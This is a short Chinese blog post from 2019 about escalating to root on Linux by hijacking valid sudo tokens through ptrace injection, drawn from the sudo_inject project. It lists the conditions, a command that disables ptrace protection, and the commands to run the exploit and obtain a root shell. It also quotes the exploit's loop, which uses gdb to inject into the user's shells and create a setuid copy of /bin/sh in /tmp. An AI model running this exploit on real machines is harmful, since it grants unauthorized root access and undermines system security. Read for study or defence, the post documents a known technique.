sudo token提权

  1. sudo token提权
  2. 使用条件
  3. 利用方法

sudo token提权

昨日在安全热点中见到一个说到sudo的token
来获得root权限

Referer:sudo token提权
仓库地址:https://github.com/nongiach/sudo_inject

使用条件

Ptrace完全启用(/ proc / sys / kernel / yama / ptrace_scope == 0)。
当前用户必须具有具有相同uid的有效sudo令牌的生活进程。

利用方法

下载上面所说的仓库地址,在本地执行echo 0 > /proc/sys/kernel/yama/ptrace_scope模拟一个环境

执行以下两条命令,你将获得一个root权限的终端

sh exploit_v2.sh
/tmp/sh -p

看了一下exploit_v2.sh里的利用代码

# create suid shell
echo "Creating suid shell in /tmp/sh"
echo "Current process : $$"
# inject all shell belonging to the current user, our shell one :p
for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" | grep -v "^$$\$")
do
        echo "Injecting process $pid -> "$(cat "/proc/$pid/comm")
    echo 'call system("echo | sudo -S cp /bin/sh /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/sh >/dev/null 2>&1")' \
        | gdb -q -n -p "$pid" >/dev/null 2>&1
done

文章还有其他的操作,详情请看仓库地址


你可以自由地:
分享 – 在任何媒介或格式下再分发、传播本创作。
只要遵守下述条款规定,授权人将不能撤回你使用本创作的自由。
唯须遵循以下条款:
署名 – 你必须以给予姓名标注,并提供本许可证的链接。同时你需要声明公开的创作是否经过修改。你可以采用恰当的形式将相关信息表述出来,但不得以任何形式暗示授权人已正式认可了你以及你的使用行为。
非商业性 – 你不得将本创作运用于商业目的。
禁止演绎 – 如果你对本创作进行了重混、转换、依据本创作进行再创作等行为,你不得再次公开散布经过修改的创作。
不得增加额外限制 – 你不能增设任何法律限制或是技术限制,来限制他人进行本许可证已经允许的行为。

声明:
当你使用本创作中属于公众领域的元素,或当法律有额外或限制条款允许你的使用行为时,则你不需要遵守本授权协议。

不提供保证。本授权协议并不能完全提供你预期需要的所有许可,例如:公共形象权,隐私权,著作人身权等其他权利,这些权利的法律限制可能会限制你使用本创作。


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:sudo token提权

本文作者:九世

发布时间:2019-05-04, 10:58:59

最后更新:2019-05-04, 11:45:37

原始链接:http://422926799.github.io/posts/2b74b00d.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录